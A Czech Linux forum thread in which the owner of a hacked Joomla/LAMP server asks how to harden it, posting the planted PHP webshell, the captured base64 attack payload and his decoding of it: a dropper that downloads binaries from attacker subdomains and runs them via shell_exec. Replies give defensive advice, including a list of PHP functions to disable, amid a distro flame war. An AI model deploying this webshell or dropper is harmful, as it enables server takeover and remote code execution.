abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

dnes 20:40 | Zajímavý článek

Lukáš Růžička v článku S Hydrogenem za lepší rytmus aneb bubeníkem snadno a rychle na MojeFedora.cz představuje automatického bubeníka s názvem Hydrogen (Wikipedie): Hydrogen je velmi vydařený program, který rozhodně nesmí chybět ve výbavě žádného linuxového muzikanta. Umožňuje nejen vytváření jednoduchých bicích doprovodů, ale také sofistikované programování bicích a perkusí, jehož výsledek se naprosto vyrovná drahým

… více »
Ladislav Hagara | Komentářů: 0
dnes 13:55 | Zajímavý projekt

UPSat (Twitter) je první open source nanodružice (CubeSat). Jedná se o společný projekt nadace Libre Space Foundation a University of Patras. Repozitáře projektu jsou k dispozici na GitHubu. Pod Libre Space Foundation patří také projekt SatNOGS (zprávička), projekt globální sítě open source pozemních satelitních stanic, vítězný projekt soutěže The Hackaday Prize 2014. UPSat je součástí mise QB50 (Twitter). ID UPSatu je GR02. GPS přijímač na UPSatu je od české společnosti SkyFox Labs. Součástí mise QB50 je i česká nanodružice VZLUSAT-1 s ID CZ02.

Ladislav Hagara | Komentářů: 3
21.4. 15:00 | Komunita

V diskusním listu Thunderbird planning vývojáři poštovního klienta Thunderbird řeší, zda by nebylo možné budoucí Thunderbird postavit nad webovými technologiemi, tj. nad Electronem, stejně jako například Nylas Mail. Gecko, nad kterým je Thunderbird postaven, se má hodně změnit. V plánu je odstranění vlastností, které Firefox už nepotřebuje, ale Thunderbird je na nich závislý [Hacker News, reddit].

Ladislav Hagara | Komentářů: 81
21.4. 10:22 | Bezpečnostní upozornění

Společnost Oracle vydala čtvrtletní bezpečnostní aktualizaci svých softwarových produktů (CPU, Critical Patch Update). Opraveno bylo celkově 299 bezpečnostních chyb. V Oracle Java SE je například opraveno 8 bezpečnostních chyb. Vzdáleně zneužitelných bez autentizace je 7 z nich. V Oracle MySQL je opraveno 39 bezpečnostních chyb. Vzdáleně zneužitelných bez autentizace je 11 z nich.

Ladislav Hagara | Komentářů: 6
21.4. 10:00 | Pozvánky

V úterý 25. dubna proběhne další Prague Containers Meetup. Přijďte se nechat inspirovat jak zlepšit build/delivery pipeline vašich kontejnerových aplikací.

little-drunk-jesus | Komentářů: 2
20.4. 21:33 | Komunita

Na Launchpadu se objevilo kódové jméno následující verze Ubuntu. Ubuntu 17.10 bude Artful Aardvark (mazaný hrabáč) [OMG! Ubuntu!].

Ladislav Hagara | Komentářů: 10
20.4. 20:11 | Zajímavý software

MojeFedora.cz informuje, že společnost Nylas oznámila vydání verze 2.0 poštovního klienta Nylas Mail (původně Nylas N1), která již plně podporuje Linux. Obchodní model společnosti je tzv. open core. Samotný klient je open source, ale uživatel si musí připlatit za některé pokročilé funkce. V základu se lze připojit k GMailu nebo libovolnému účtu přes IMAP. Podpora Exchange je pouze v placené verzi. Klient je napsaný nad Electronem.

Ladislav Hagara | Komentářů: 12
20.4. 15:55 | Zajímavý článek

České centrum pro investigativní žurnalistiku (ČCIŽ) publikovalo na svých stránkách článek s názvem Je česká státní správa „rukojmím Microsoftu“?. Drtivá většina české veřejné správy je závislá na výrobcích softwarového gigantu Microsoft – a nijak zvlášť jí to nevadí.

Ladislav Hagara | Komentářů: 18
20.4. 02:48 | Nová verze

Google Chrome 58 byl prohlášen za stabilní. Nejnovější stabilní verze 58.0.3029.81 tohoto webového prohlížeče přináší řadu oprav a vylepšení (YouTube). Opraveno bylo 29 bezpečnostních chyb. Mezi nimi i chyba umožňující phishing s unicode doménami.

Ladislav Hagara | Komentářů: 0
19.4. 22:44 | Nová verze

Po šesti týdnech od vydání verze 52.0 byla vydána verze 53.0 webového prohlížeče Mozilla Firefox. Z novinek lze upozornit například na nové kompaktní vzhledy – tmavý z Firefoxu Developer Edition a jeho světlá varianta. Na Linuxu byla ukončena podpora procesorů starších než Pentium 4 a AMD Opteron. Podrobné informace v poznámkách k vydání a na stránce věnované vývojářům. Řešeny jsou také bezpečnostní chyby.

Ladislav Hagara | Komentářů: 11
Chystáte se pořídit CPU AMD Ryzen?
 (4%)
 (35%)
 (0%)
 (7%)
 (45%)
 (10%)
Celkem 273 hlasů
 Komentářů: 31, poslední 20.4. 21:26
    Rozcestník

    Dotaz: hakli mě, co udělat pro zabezpečení LAMP serveru

    31.3.2014 14:38 looker
    hakli mě, co udělat pro zabezpečení LAMP serveru
    Přečteno: 1348×
    provozoval jsem LAMP server s joomlou 2.5 a stalo se, že mě hakli. Mám nějaké informace ze skriptů, co šly na vyžádání infikovanými stránkami. obsah infikované stránky:
    $ietdgc = "8c8580370182a2d20127a69c5c7b1af6"; 
      if(isset($_REQUEST['eosdzj'])) 
        { $wmbqhi = $_REQUEST['eosdzj']; 
        eval($wmbqhi); exit(); }
      if(isset($_REQUEST['geokxjkd'])) 
        { $wwdqd = $_REQUEST['ulgidjx']; 
          $koayobr = $_REQUEST['geokxjkd']; 
          $lyuot = fopen($koayobr, 'w'); 
          $zcawdru = fwrite($lyuot, $wwdqd); 
          fclose($lyuot); 
          echo $zcawdru; 
          exit(); }
    
    todle šlo POSTem po otevření infikované stránky:eosdzj=%24p+%3d+array%5fkeys%28%24%5fREQUEST%29%3b+echo+%24%5fREQUEST%5b%24p%5b2%5d%5d%3b+eval%28base64%5fdecode%28%24%5fREQUEST%5b%24p%5b1%5d%5d%29%29%3b&p1=ZnVuY3Rpb24gZG93bmxvYWRGaWxlICgkdXJsLCAkcGF0aCkgewoKICAkbmV3Zm5hbWUgPSAkcGF0aDsKICAkZmlsZSA9IGZvcGVuICgkdXJsLCAicmIiKTsKICBpZiAoJGZpbGUpIHsKICAgICRuZXdmID0gZm9wZW4gKCRuZXdmbmFtZSwgIndiKyIpOwoKICAgIGlmICgkbmV3ZikKICAgIHdoaWxlKCFmZW9mKCRmaWxlKSkgewogICAgICBmd3JpdGUoJG5ld2YsIGZyZWFkKCRmaWxlLCAxMDI0ICogNjQgKSwgMTAyNCAqIDY0ICk7CiAgICB9CiAgfQoKICBpZiAoJGZpbGUpIHsKICAgIGZjbG9zZSgkZmlsZSk7CiAgfQoKICBpZiAoJG5ld2YpIHsKICAgIGZjbG9zZSgkbmV3Zik7CiAgfQogfQoKJG9zID0gcGhwX3VuYW1lKCdzJyk7CiR0eXBlID0gcGhwX3VuYW1lKCdtJyk7CgplY2hvICJQSFBfU1RBUlQiOwoKaWYgKCAhZnVuY3Rpb25fZXhpc3RzKHNoZWxsX2V4ZWMpICkKewoJZWNobyAibm9leGVjXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgppZiAoICRvcyAhPT0gIkxpbnV4IiApCnsKCWVjaG8gIk5vTGludXg6ICIuJG9zLiI8YnI%2bXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgoKCmlmICgkdHlwZSA9PSAieDg2XzY0IikgLy82NC1iaXQgb3MKewoJcHJpbnQgIng4Nl82NFxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzNjQiOwoJJHBzID0gIi4vcHM2NCI7Cn0KZWxzZQp7CglwcmludCAiaTY4NlxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzMzIiOwoJJHBzID0gIi4vcHMzMiI7Cn0KCiRwcyA9ICJwcyI7CgppZiAoIWZpbGVfZXhpc3RzKCRwcykpCnsKCWVjaG8gIkRvd25sb2FkICRkd1xuIjsKCWRvd25sb2FkRmlsZSgkZHcsICRwcyk7CgkvL0BmaWxlX3B1dF9jb250ZW50cygiJFBTIiwgQGZpbGVfZ2V0X2NvbnRlbnRzKCRkdykpOwp9CmVsc2UKewoJZWNobyAiRXhpc3RzICRwc1xuIjsKfQoKCmNobW9kICgkcHMsICIwNzU1Iik7CgokZW52ID0gIkJEVT1odHRwOi8vYnQyMi5tdXNpa2xzdC5vcmcvYXIxLnBocCBTSFU9aHR0cDovL3Nlby5tdXNpa2xzdC5vcmcvZ3UucGhwIFNLVT1odHRwOi8vc2VlazIyLm11c2lrbHN0Lm9yZy8gTElOPTYwMDAgREJOPWFmMDAxIjsKJGNtZCA9ICRlbnYuIiAuLyRwcyA%2bL2Rldi9udWxsIDI%2bL2Rldi9udWxsICYiOwokb3V0ID0gc2hlbGxfZXhlYygkY21kKTsKCnVubGluayAoJHBzKTsKCmVjaG8gIlBIUF9FTkQiOwo%3d&p2=b1946ac92492d2347c6235b4d2611184&shid=33338 snažil jsem se to rozluštit a dostal jsem z toho skript:
    $p = array_keys($_REQUEST);
      echo $_REQUEST[$p[2]];
      eval(base64_decode($_REQUEST[$p[1]]));
    a proměnná $p[1] obsahuje toto:
     function downloadFile ($url, $path) 
        { $newfname = $path; $file = fopen ($url, "rb");
           if ($file) { $newf = fopen ($newfname, "wb+");
                        if ($newf) while(!feof($file)) 
                          { fwrite($newf, fread($file, 1024 * 64 ), 1024 * 64 ); }
                      } 
          if ($file) { fclose($file); } 
          if ($newf) { fclose($newf); } } 
      $os = php_uname('s'); 
      $type = php_uname('m'); 
      echo "PHP_START"; 
      if ( !function_exists(shell_exec) ) 
          { echo "noexec\n"; echo "PHP_END"; exit(0); } 
      if ( $os !== "Linux" ) { echo "NoLinux: ".$os."
        
      
    \n"; echo "PHP_END"; exit(0); } if ($type == "x86_64") //64-bit os { print "x86_64\n"; $dw = "http://pages.musiklst.org/ps64"; $ps = "./ps64"; } else { print "i686\n"; $dw = "http://pages.musiklst.org/ps32"; $ps = "./ps32"; } $ps = "ps"; if (!file_exists($ps)) { echo "Download $dw\n"; downloadFile($dw, $ps); //@file_put_contents("$PS", @file_get_contents($dw)); } else { echo "Exists $ps\n"; } chmod ($ps, "0755"); $env = "BDU=http://bt22.musiklst.org/ar1.php SHU=http://seo.musiklst.org/gu.php SKU=http://seek22.musiklst.org/ LIN=6000 DBN=af001"; $cmd = $env." ./$ps >/dev/null 2>/dev/null &"; $out = shell_exec($cmd); unlink ($ps); echo "PHP_END"; )
    podle data te infikovane stranky jsem našel asi 20 podobných, server jsem přeinstalil, nahodil modsecurity a v logu vidím pokusy o otevření (bývalých) infikovaných php stránek. záznam POST mám ale jen pro tuhle infikovanou php stránku (úplně první kód nahoře), a to proto, že to po vykonání POST házelo error: Apache-Error: [file "/build/buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2/php5-5.3.3/sapi/apache2handler/sapi_apache2.c"] [line 326] [level 3] PHP Notice: Use of undefined constant shell_exec - assumed 'shell_exec' in /var/www/stranky/libraries/joomla/http/index.php(1) : eval()'d code(1) : eval()'d code on line 28 Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky. Díky

    Odpovědi

    31.3.2014 14:53 lertimir | skóre: 60 | blog: Par_slov
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Asi nejdříve je dobré zjistit, jak vnikli do systému a na co se zaměřili. Mě hakli před asi 8 lety. A než jsem server přeinstaloval, tak jsem ho pečlivě zazálohoval a pak studoval, co a jak hackli.

    Asi hlavní je joomlu aktualizovat. Jaká tam byla verze? Zranitelnosti jsou vidět třeba zde a podle tohoto pokud tam byla verze starší než 2.5.14 tak tam šlo uploadnout např php soubor a pak ho spustit. takže si útočník mohl dělat, co chtěl.

    31.3.2014 15:18 petr_p | skóre: 59 | blog: pb
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Přesně tak. Spousta lidí si myslí, že nainstalují server a tím práce končí. Naopak. Tím práce začíná.
    31.3.2014 15:41 looker
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Jj na99% to bylo pres joomlu. Preinstalil jsem a pouzil uz verzi 3. cely infikovany srvr mam koply bokem a analyzuju ho. Chtel jsem poradit, jestli treba nezakazat nektere php ficury, ktere jsou takle drsne zneuzitelne.
    Jendа avatar 1.4.2014 00:46 Jendа | skóre: 73 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Chtel jsem poradit, jestli treba nezakazat nektere php ficury, ktere jsou takle drsne zneuzitelne.
    V PHP je dost slabá hranice mezi nebezpečné a užitečné, často se to i překrývá.
    "Vzbuď se ve 4.20 a jdi ke kolejím (k jakýmkoliv, které najdeš)" "OK, jsem na Strahově, what next?"
    Josef Kufner avatar 31.3.2014 15:53 Josef Kufner | skóre: 67
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Pokud provozuješ služby pochybné kvality, ale jen pro omezené množství lidí (např. jen interně ve firmě), můžeš přístup omezit jen skrz VPN. Pokud to má být přístupné i zákazníkům, tak to ale nepůjde.
    Hello world ! Segmentation fault (core dumped)
    31.3.2014 17:24 Petr Masopust | skóre: 14
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Joomla je derava jak cednik, prejdi na jiny cms.
    Jendа avatar 1.4.2014 00:44 Jendа | skóre: 73 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Děravé jsou bohužel skoro všechny CMS.

    Zavřel bych každý web pod zvláštního uživatele a sledoval divnou aktivitu (odesílání mailů, DDoSy ven…)
    "Vzbuď se ve 4.20 a jdi ke kolejím (k jakýmkoliv, které najdeš)" "OK, jsem na Strahově, what next?"
    1.4.2014 04:45 Andrej | skóre: 43 | blog: Republic of Mordor | Zürich
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.

    Předně je nezbytné změnit distribuci. Když člověk používá tu nejhorší, jaká je kde k nalezení, těžko se může divit následkům tohoto typu. Nikdo neví, kolik se v záměrně špatných distribucích skrývá problémů tohoto rozsahu.

    ǑǦŹǓǕǙǞǺǨȞȬḔḦḰḾṊṎṸẄẌỖ
    1.4.2014 07:57 rastos | skóre: 60 | blog: rastos
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Ono bola niekde spomenutá distribúcia?
    1.4.2014 11:20 Šangala | skóre: 56 | blog: Dutá Vrba - Wally
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    …buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2…

    Taky jsem to hledal…

    To, že trpíš stihomamem, ještě neznamená, že po tobě nejdou. ⰞⰏⰉⰓⰀⰜⰉ ⰗⰞⰅⰜⰘ ⰈⰅⰏⰉ ⰒⰑⰎⰉⰁⰕⰅ ⰏⰉ ⰒⰓⰄⰅⰎ ·:⁖⁘⁙†
    1.4.2014 08:24 Šangala | skóre: 56 | blog: Dutá Vrba - Wally
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Stále tě ta vnitřní zloba neopustila?
    To, že trpíš stihomamem, ještě neznamená, že po tobě nejdou. ⰞⰏⰉⰓⰀⰜⰉ ⰗⰞⰅⰜⰘ ⰈⰅⰏⰉ ⰒⰑⰎⰉⰁⰕⰅ ⰏⰉ ⰒⰓⰄⰅⰎ ·:⁖⁘⁙†
    2.4.2014 09:55 Andrej | skóre: 43 | blog: Republic of Mordor | Zürich
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    :-D Tak to je dobrá otázka. Ne, stále ještě mě neopustil ten zlozvyk říkat přesně to, co kolem sebe vidím, bez vytáček, bez politické korektnosti a bez snahy být zadobře se „všemi“ nebo s „většinou“.

    Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne. Hlavně je úsměvné, jak často Debian neustojí ani jednu jedinou aktualizaci systému (což je pro normální distribuce běžný proces, který by se měl dít asi tak jednou týdně nebo častěji) a jeho uživatel pak celý stroj přeinstaluje, místo Shitty tam dá Crappy a dostane se znova do naprosto stejné situace, jen posunuté v čase. :-) Kdepak zloba — zkrátka jen říkám, co vidím.

    ǑǦŹǓǕǙǞǺǨȞȬḔḦḰḾṊṎṸẄẌỖ
    2.4.2014 12:28 Šangala | skóre: 56 | blog: Dutá Vrba - Wally
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Jo dobrý pokus okecat, ale stále je to demagogie…
    To, že trpíš stihomamem, ještě neznamená, že po tobě nejdou. ⰞⰏⰉⰓⰀⰜⰉ ⰗⰞⰅⰜⰘ ⰈⰅⰏⰉ ⰒⰑⰎⰉⰁⰕⰅ ⰏⰉ ⰒⰓⰄⰅⰎ ·:⁖⁘⁙†
    2.4.2014 14:17 ewew | skóre: 36 | blog: ewewov_blog
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    Dokladuj prípady zlyhania aktualizácie debianu.

    sec.linuxpseudosec.sk
    4.4.2014 20:17 Andrej | skóre: 43 | blog: Republic of Mordor | Zürich
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    K tomu nemám důvod ani potřebu, i když by asi stačilo prohledat pár desítek dotazů z místní poradny. Kdo chce tu sračku používat, dobře mu tak. :-) Proč bych mu něco dokládal?

    ǑǦŹǓǕǙǞǺǨȞȬḔḦḰḾṊṎṸẄẌỖ
    4.4.2014 20:27 ewew | skóre: 36 | blog: ewewov_blog
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    Ich habe keine Probleme mit stable debian.Du nichts mochte lernen.

    I Dont have a Problem with stable debian. You dont want to learn.

    sec.linuxpseudosec.sk
    2.4.2014 14:54 omq
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Fakt? Nějak jsem si u stable verzí nevšiml.

    Asi je to na tebe moc složité.
    4.4.2014 20:22 Andrej | skóre: 43 | blog: Republic of Mordor | Zürich
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    Co je to stable verze? Jak může mít systém sestávající z tisíců balíčků verzi? Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.

    Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví. Děkuji, nechci. Používat 5 let staré technologie s 5 let starými bugy je na mě opravdu moc složité. :-D Já používám pouze software, který je aktuální a který zkrátka funguje.

    ǑǦŹǓǕǙǞǺǨȞȬḔḦḰḾṊṎṸẄẌỖ
    4.4.2014 22:57 trekker.dk | skóre: 71
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.
    Your logic is flawed...
    Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví.
    To je lež, lež, lež.
    Quando omni flunkus moritati
    2.4.2014 15:53 trekker.dk | skóre: 71
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Kdepak zloba — zkrátka jen říkám, co vidím.
    Halucinogeny jsou svinstvo. Zkus to bez nich a možná to bude lepší.
    Quando omni flunkus moritati
    4.4.2014 23:27 ewew | skóre: 36 | blog: ewewov_blog
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne.

    Na arch by mohol byť aj titulok : "Arch falling of the Cliff"

    sec.linuxpseudosec.sk
    1.4.2014 11:53 trekker.dk | skóre: 71
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Předně je nezbytné změnit distribuci.
    Schovej si tyhle svoje bláboly někam mimo poradnu, jo? Děravou Joomlu opravdu změna distribuce nevyřeší.

    A co se týče odkazovaného problému - IIRC se vývojáři Debianu ptali v mailové konferenci vývojářů OpenSSL a ti tu (chybnou) změnu odsouhlasili s tím, že totéž udělají v upstreamu. Následně zjistili, že ne, ale nikomu v Debianu už to neřekli.
    Quando omni flunkus moritati
    1.4.2014 12:24 ewew | skóre: 36 | blog: ewewov_blog
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    Vieš o tom, že archlinux v openVZ poriadne nefunguje.

    Ako si predstavuješ bezpečnosť ? Vyzerá to tak, že nová verzia všetko rieši.

    sec.linuxpseudosec.sk
    2.4.2014 10:15 Andrej | skóre: 43 | blog: Republic of Mordor | Zürich
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru

    Mně stačí, že funguje v LXC. Navíc v ArchLinuxu v podstatě nikdy nepoužívám distribuční kernel, takže vlastně nevím, kde všude ArchLinux sám od sebe funguje a kde ne.

    Na serverech často ArchLinux nemám, protože ne každý je fanouškem ArchLinuxu a u sdílených strojů je lepší mít systém, kterému s rozumnou pravděpodobností bude víc lidí rozumět. Proto zpravidla padne volba na Fedoru. U jednoho z předchozích zaměstnavatelů jsem měl dokonce desktop s Fedorou (zpočátku z povinnosti/nutnosti). Sice to nebyl můj oblíbený ArchLinux s custom kernelem a pár vychytávkami, ale co se týká spolehlivosti a rozumného implicitního nastavení, nemohl jsem si ten desktop vynachválit. Tedy nechápu ten intenzivní masochismus, který někoho přivede až k Debianu, ať už na desktopu nebo na serveru.

    Problémy s bezpečností nemají jiné řešení než přechod na novou verzi. Jediná otázka je, jestli to bude nová verze přímo od tvůrců daného balíčku (což přesně v případě OpenSSL nelze než doporučit), nebo stokrát patchovaný paskvil, který se snaží opravit chybu a zároveň zůstat kompatibilní s nějakým zoufale zastaralým prostředím. Debian volí druhou možnost a jeho 32768 OpenSSL klíčů byl jeden z hvězdných výsledků tohoto přístupu k věci.

    ǑǦŹǓǕǙǞǺǨȞȬḔḦḰḾṊṎṸẄẌỖ
    Jendа avatar 2.4.2014 10:22 Jendа | skóre: 73 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Příloha:
    Arch, to je taková ta distribuce, jak ji NBÚ začlo mirrorovat, načež když konečně začali po deseti letech podepisovat balíčky, tak ji mirrorovat přestalo?
    mirror.vpsfree.cz:~# grep "connect from" /var/log/rsyncd
    ...
    2012/08/08 08:32:54 [13520] connect from UNKNOWN (195.39.65.169)
    2012/08/09 09:27:11 [15203] connect from UNKNOWN (195.39.65.169)
    2012/08/10 12:28:49 [18338] connect from UNKNOWN (195.39.65.169)
    2012/08/13 12:21:57 [30405] connect from UNKNOWN (195.39.65.169)
    2012/08/14 10:13:22 [32294] connect from UNKNOWN (195.39.65.169)
    2012/08/14 17:28:08 [432] connect from UNKNOWN (195.39.65.169)
    2012/08/15 11:37:58 [1857] connect from UNKNOWN (195.39.65.169)
    2012/08/21 17:19:28 [15359] connect from UNKNOWN (195.39.65.169)
    2012/08/21 17:37:54 [15372] connect from UNKNOWN (195.39.65.169)
    2012/08/21 17:38:36 [15373] connect from UNKNOWN (195.39.65.169)
    2013/01/14 21:56:20 [19673] connect from node1a.prg.vpsfree.cz (77.93.223.10)
    
    "Vzbuď se ve 4.20 a jdi ke kolejím (k jakýmkoliv, které najdeš)" "OK, jsem na Strahově, what next?"
    MMMMMMMMM avatar 1.4.2014 08:30 MMMMMMMMM | skóre: 41 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Potřebuješ používat funkci shell_exec? Osobně mám na serveru zakázány tyto funkce: apache_child_terminate, symlink, apache_setenv, putenv, define_syslog_variables, diskfreespace, disk_free_space, disk_total_space, dl, escapeshellarg, escapeshellcmd, exec, leak, link, openlog, passthru, pfsockopen, popen, posix_getgrnam, posix_getpgid, posix_getpwuid, posix_getpwnam, posix_getrlimit, posix_initgroups, posix_kill, posix_mkfifo, posix_mknod, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, readlink, register_tick_function, set_time_limit, shell_exec, show_source, syslog, system

    + používám ještě suhosin (který je podporovaný maximálně pro verzi PHP 5.3.x)
    1.4.2014 09:40 looker
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    ne, právě díky shell_exec erroru jsem se dostal k tomu logu příchozího skriptu. Určitě pozakazuju co maximálně půjde, díky za tipy. Distribuce byla Debian 6.0.6 PHP musím pohledat jaká tam byla verze v době haku. Ale poslední byla PHP5.3.3 suhosin jsem tam viděl, ale ještě pozkoumám,jak natom byl v době minulé-jestli budou stačit logy.
    7.4.2014 07:41 looker
    Rozbalit Rozbalit vše Re: hakli mě, co udělat pro zabezpečení LAMP serveru
    Poupravil jsem funkce php, pomohl mi v tom auditovaci skript: http://php-security-audit.com/script/view/ další byla instalace a konfigurace modsecurity, vychytává mi některé finty XXS a do budoucna se dá lehce ladit. a jako poslední jsem potunil fail2ban, při spouštění vytvoří trvalý ban pro blacklist, který si generuju skriptem z error.logu apache. Kouknu do něj, podle záznamů - moduly které zaručeně nemám a na které chodí dotazy - ty IP mi skript naháže do blacklistu a už maj smůlu. krom toho projistotu seznam filtruju whitelistem, aby mě to taky náhodou nebanlo ;-)

    Ad. Josef Kufner: provozuju malý web pro neziskové sdružení, moje kvality poskytnutých služeb proto určitě postačují. Obávám se,že i kdybych provozoval web u hostingu, tak když se tam dostali přes mou joomlu, dostali by se tam i přes joomlu na hostingu.

    Ad. Andrej: respektuju tvůj názor na Debian, ačkoli ho teda nesdílím. A tvůj příspěvek mi příjde trochu mimo, neptal jsem se na kvalitu distribuce. Něco jako bych já šel ná fórum škodovky, kde má někdo problém s převodovkou u suprbu a radil mu, že škodovka stojí za hojno, ať si raděj koupí dáčiju ;-)

    Díky těm, co se snažili poradit.

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.